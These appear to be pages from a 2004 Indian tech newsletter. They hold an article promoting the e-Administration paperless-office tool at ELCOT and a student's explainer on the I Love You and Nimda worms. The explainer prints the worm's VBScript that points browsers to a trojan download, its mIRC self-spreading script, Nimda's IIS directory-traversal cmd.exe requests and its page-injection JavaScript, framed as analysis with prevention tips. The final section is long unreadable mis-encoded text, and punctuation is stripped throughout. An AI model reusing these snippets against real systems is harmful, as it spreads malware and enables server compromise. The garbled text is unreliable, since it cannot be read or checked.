e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

